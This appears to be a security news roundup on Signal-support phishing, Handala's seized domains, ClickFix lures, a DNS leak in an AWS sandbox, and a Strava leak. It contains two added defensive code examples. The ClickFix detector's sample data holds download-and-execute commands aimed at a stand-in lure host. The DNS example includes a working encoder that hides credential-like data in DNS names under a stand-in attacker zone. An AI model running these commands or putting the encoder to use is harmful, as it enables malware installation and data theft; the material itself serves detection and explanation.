Industry · 5 min read · The Register

Russians are posing as Signal support to launch phishing attacks

Redakcja Pixelift

Photo: The Register

Thousands of Signal accounts have fallen victim to Russian intelligence groups impersonating the app's official technical support. The FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have issued an urgent warning about a phishing campaign targeting politicians, journalists, military personnel, and former government officials. The attackers rely on social engineering: a message warns of alleged "suspicious activity" on the account and urges the victim to click a verification link. Users who enter their login credentials or 2FA codes on the fraudulent site lose control of their communications: the attackers gain access to message history, contact lists, and the ability to send messages in the victim's name. Signal remains one of the most secure messengers thanks to end-to-end encryption, but these incidents show that even the strongest encryption is useless once the account itself is handed over. The lesson for users everywhere is plain: legitimate technical support almost never initiates contact through direct messages inside the app. The key safeguards remain verifying the identity of the other party outside the communication channel and never entering authorization codes on external websites. Digital security in 2026 no longer rests on technology alone, but above all on limiting trust in messages that look as if they come from the system.

Even the most advanced end-to-end encryption is useless when the user voluntarily opens the door for an attacker. That is the brutal lesson currently being delivered to the world by groups linked to Russian intelligence. According to the latest warning from the FBI and CISA, these actors have begun impersonating Signal technical support at scale, exploiting the trust the platform enjoys among particularly privacy-conscious users.

The campaign is not indiscriminate; it hits precisely selected targets: former government officials, military personnel, politicians, and journalists. Through social engineering the attackers take over accounts, which gives them insight into conversation history and contact lists and the ability to send messages on the victim's behalf. It is a classic spear-phishing operation, and it shows once again that the weakest link in the security chain is the human, not the application's source code.

Mechanism of the fraud: The "verification" trap

The attack begins with a message that looks strikingly like an official communication from the Signal support team. It typically reports "suspicious activity" detected on the account and urges immediate action to avoid a lockout. The user is sent to an external site to complete a "verification" process. In reality it is a carefully prepared phishing page whose sole purpose is to capture authentication data or, worse, a two-factor authentication (2FA) code.

If the victim enters the verification code on the spoofed site, the attackers immediately pair the account with a device of their own. From that moment on they read the victim's conversations in real time as a linked device. One practical check follows from this: Signal lists every paired device under Settings > Linked Devices, and an entry the user did not add is the tell-tale sign of this attack; removing it cuts the attacker off. Signal's reputation also works against its users, who often feel too safe and assume that the app itself protects them from every form of surveillance. Russian operational groups exploit exactly that psychological mechanism, turning a tool meant for secure communication into a direct access channel for intelligence.

  • Targeting: Precisely selected individuals of high intelligence value.
  • Method: Impersonating official technical support (Signal Support).
  • Goal: Account takeover, theft of contact lists, and monitoring of correspondence.
  • Consequence: Total compromise of confidential data despite the use of encryption.

Iranian information warfare and seized domains

While Russia focuses on quiet intelligence collection, the U.S. Department of Justice (DOJ) has moved aggressively against Iranian influence operations. Authorities seized four domains (including Justicehomeland[.]org and Handala-Hack[.]to) used by the Handala group. The group, regarded as an arm of Iran's Ministry of Intelligence and Security (MOIS), was behind the high-profile attack on the medical company Stryker, in which a vulnerability in Microsoft Intune was exploited to remotely wipe employees' devices: a reminder that a device-management service able to wipe a whole fleet is itself a prime target.

However, Handala's activity went beyond cyber vandalism. The seized sites were used for aggressive psychological warfare, including doxxing IDF soldiers (publishing their personal data) and spreading conspiracy theories and antisemitic myths. Despite the FBI's takedown of the infrastructure, the group's representatives posted a statement online declaring that their activities would continue, a clear sign that seizing domains is only a temporary hindrance in an era of decentralized network infrastructure.

ClickFix and the new era of malicious bots

Parallel to state activity, the commercial sector is struggling with new techniques from ransomware groups such as LeakNet. Security reports point to the growing popularity of the ClickFix method. Instead of traditional e-mail attachments, criminals use compromised but otherwise legitimate websites to display fake "prove you are not a robot" dialogs. To "pass" the check, the user is told to press Win + R and paste a command that supposedly completes a Cloudflare Turnstile verification.

In reality the command launches msiexec, which fetches a loader built on the Deno runtime. The key aspect of the technique is that the malicious code runs directly in memory and is never written to disk, so traditional antivirus scanners that inspect files have nothing to look at. This is how relatively small criminal groups manage to infect systems in large organizations and slip past EDR (Endpoint Detection and Response) products tuned to file activity. The chain is not invisible, though: it always starts with explorer.exe (the Run dialog) spawning a signed Windows binary with a remote URL on its command line, and that process-creation event is exactly what endpoint telemetry records.

"The ClickFix technique is an evolution of social engineering – attackers no longer ask for a password; they ask for the execution of a single, seemingly trivial system command that gives them full power over the machine."
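The description above is specific enough to write the detection a SOC would want for it. The following Python block is an added example, not code from the article, from The Register, or from any vendor. It scores constructed process-creation records (the field names Image, ParentImage, CommandLine and ProcessId are Sysmon's; the values and the lure host cdn.lure-example.test are invented) for the ClickFix pattern: an explorer.exe child, because that is what the Win + R dialog spawns, running a living-off-the-land binary with a remote URL, a silent-install flag, or captcha-themed text on its command line. The in-memory stage never touches disk, but this first step always leaves a process-creation event.

```python
"""Flag ClickFix-style launches in process-creation telemetry.

Added example; not code from the article, The Register, or any vendor.
The records below are constructed and imitate a Sysmon Event ID 1 export:
Image, ParentImage, CommandLine and ProcessId are the Sysmon field names,
everything else (values, the lure domain) is invented for this example.
"""
import re

# Commands typed into the Win+R Run dialog are spawned by explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Binaries that ClickFix lures typically hand the pasted command to.
LOLBINS = {"msiexec.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
           "cmd.exe", "curl.exe", "certutil.exe"}

URL_RE = re.compile(r"https?://", re.I)
MSIEXEC_REMOTE_RE = re.compile(r"/i\s+\S+://", re.I)   # msiexec /i <url>: install straight off the network
QUIET_RE = re.compile(r"(^|\s)/q[nb]?(\s|$)", re.I)    # /q, /qn, /qb: no installer UI for the victim to notice
LURE_TEXT_RE = re.compile(r"not a robot|captcha|turnstile|verif", re.I)  # captcha theme carried in the command


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> list[str]:
    """Return the reasons an event looks like ClickFix; an empty list means benign."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent not in INTERACTIVE_PARENTS or image not in LOLBINS:
        return []
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("remote URL on the command line")
    if image == "msiexec.exe" and MSIEXEC_REMOTE_RE.search(cmd):
        reasons.append("msiexec installing a package from a URL")
    if QUIET_RE.search(cmd):
        reasons.append("silent install flag")
    if LURE_TEXT_RE.search(cmd):
        reasons.append("captcha-themed text on the command line")
    return reasons


def detect_clickfix(events) -> list[dict]:
    """Run score_event over a sequence of records and keep only the hits."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits.append({"pid": event.get("ProcessId"),
                         "image": _basename(event.get("Image", "")),
                         "reasons": reasons})
    return hits


# Constructed records; cdn.lure-example.test is an invented lure host.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /i https://cdn.lure-example.test/turnstile.msi /qn"},
    {"ProcessId": 4130, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"ProcessId": 4500, "ParentImage": r"C:\Windows\System32\services.exe",   # legitimate managed install
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Windows\Temp\corp-agent.msi /qn"},
    {"ProcessId": 5280, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://cdn.lure-example.test/c | iex" # I am not a robot - Cloudflare verification'},
    {"ProcessId": 5300, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c ipconfig /all"},
]

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(hit)
```

Tune INTERACTIVE_PARENTS and LOLBINS to the telemetry source you actually have. For forensics after the fact, the pasted string also survives in the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting from a suspected host.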

Cloud vulnerabilities and user carelessness

Security problems also reach the infrastructure giants. BeyondTrust's Phantom Labs team revealed that the sandbox in the AWS Bedrock AgentCore service did not provide the isolation it advertised. Despite Amazon's assurance that all external access was blocked, the researchers found that DNS queries could leave the sandbox. DNS is the classic hole in "no egress" policies: a process that can resolve names of its own choosing can encode data into those names, so such a leak theoretically allows a Command and Control (C2) channel and data exfiltration from AI systems.
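The AgentCore finding is one instance of a general rule: a sandbox that blocks all egress except name resolution still has a data channel, because the process chooses the names it resolves. The block below is an added example in Python (not code from the article, BeyondTrust, or AWS) that shows both halves of that rule. An encoder chunks a payload into base32 DNS labels under an attacker-controlled zone, a decoder stands in for the attacker's authoritative name server, and a resolver-log check does what a defender would do: aggregate long, high-entropy labels per zone. The zones exfil-example.test and corp-example.test, the payload, and the log lines are all constructed for the example.

```python
"""DNS as an exfiltration channel out of a 'sealed' sandbox, with a resolver-log check.

Added example; not code from the article, from BeyondTrust, or from AWS.
Part one shows how a process that can only resolve names still carries data
out: it chunks bytes into DNS labels under a zone the attacker controls.
Part two is the check a defender runs over resolver logs.  The zone names,
the payload and the log lines are all constructed for this example.
"""
import base64
import math
from collections import Counter, defaultdict

ATTACKER_ZONE = "exfil-example.test"   # constructed; the attacker's authoritative zone
BENIGN_ZONE = "corp-example.test"      # constructed; normal traffic for comparison
CHUNK_BYTES = 30                       # 30 bytes -> 48 base32 chars, inside the 63-char label limit (RFC 1035)


def exfil_queries(data: bytes) -> list[str]:
    """Names a sandboxed process would resolve to push `data` to ATTACKER_ZONE."""
    names = []
    for seq, i in enumerate(range(0, len(data), CHUNK_BYTES)):
        label = base64.b32encode(data[i:i + CHUNK_BYTES]).decode().rstrip("=").lower()
        names.append(f"{label}.{seq}.{ATTACKER_ZONE}")   # e.g. <48 chars>.3.exfil-example.test
    return names


def reassemble(names: list[str]) -> bytes:
    """What the attacker's name server does with the names it receives (any order)."""
    chunks = {}
    for name in names:
        label, seq, *_ = name.split(".")
        chunks[int(seq)] = base64.b32decode(label.upper() + "=" * (-len(label) % 8))
    return b"".join(chunks[k] for k in sorted(chunks))


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def registrable(qname: str) -> str:
    # Assumption: the last two labels are the registrable zone.  Production
    # code should consult the Public Suffix List instead.
    return ".".join(qname.rstrip(".").split(".")[-2:])


def flag_exfil(log_lines, min_hits=5, long_label=30, high_entropy=3.0) -> dict:
    """Return zones that received at least min_hits long, high-entropy leftmost labels.

    log_lines are '<epoch> <client> <qname>' records (constructed format).
    Aggregating per zone is what separates exfiltration from the occasional
    long CDN hostname: one odd name is noise, a burst under one zone is a channel.
    """
    per_zone = defaultdict(lambda: {"queries": 0, "unique": set(), "suspicious": 0})
    for line in log_lines:
        _ts, _client, qname = line.split()
        st = per_zone[registrable(qname)]
        st["queries"] += 1
        st["unique"].add(qname)
        first = qname.split(".")[0]
        if len(first) >= long_label and shannon_entropy(first) >= high_entropy:
            st["suspicious"] += 1
    return {zone: {"queries": s["queries"], "unique": len(s["unique"]), "suspicious": s["suspicious"]}
            for zone, s in per_zone.items() if s["suspicious"] >= min_hits}


# Constructed payload shaped like temporary cloud credentials; nothing here is a real key.
PAYLOAD = (b'{"AccessKeyId":"AKIAEXAMPLEKEY0001",'
           b'"SecretAccessKey":"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",'
           b'"SessionToken":"FwoGZXIvYXdzEXAMPLETOKEN0123456789abcdefghij"}')


def sample_log() -> list[str]:
    """Constructed resolver log: ordinary corporate lookups plus the exfil burst."""
    benign = ["www", "api", "mail", "cdn-assets-prod-us-east-1-static-content", "api"]
    lines = [f"1700000{i:03d} 10.0.0.{i + 5} {name}.{BENIGN_ZONE}" for i, name in enumerate(benign)]
    lines += [f"1700000{i:03d} 10.0.0.42 {name}" for i, name in enumerate(exfil_queries(PAYLOAD), 100)]
    return lines


if __name__ == "__main__":
    names = exfil_queries(PAYLOAD)
    assert reassemble(names) == PAYLOAD
    for zone, stats in flag_exfil(sample_log()).items():
        print(zone, stats)
```

The thresholds are starting points, not tuned values: base32 labels of real secrets land well above 3 bits of entropy, but so do some legitimate CDN and telemetry hostnames, which is why the check counts distinct suspicious names per zone rather than alerting on a single query. Note also that the long benign label in the sample trips the per-name test once and is still not reported.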

At the other end of the threat spectrum lies mundane human carelessness, exemplified by the recent leak of a French aircraft carrier's location. A sailor using the Strava app to log a run across the vessel's deck unknowingly shared a 7-kilometer route. The GPS data uploaded to Strava's servers allowed the warship to be tracked precisely. This is further proof that in the age of ubiquitous IoT devices and wearables, operational security (OPSEC) is undone by the simplest user habits.

Analyzing the above incidents, one can hypothesize that in the coming years, the focal point of cybersecurity will shift from infrastructure protection to the protection of identity and user decision-making processes. Since even advanced AWS sandboxes can be leaky, and secure messengers like Signal are used as attack vectors, the only effective barrier remains a radical change in the approach to online trust. We face an era of "digital pessimism," where every interaction, even one that looks like a system prompt, will have to be subjected to multi-level verification outside the main communication channel.

Source: The Register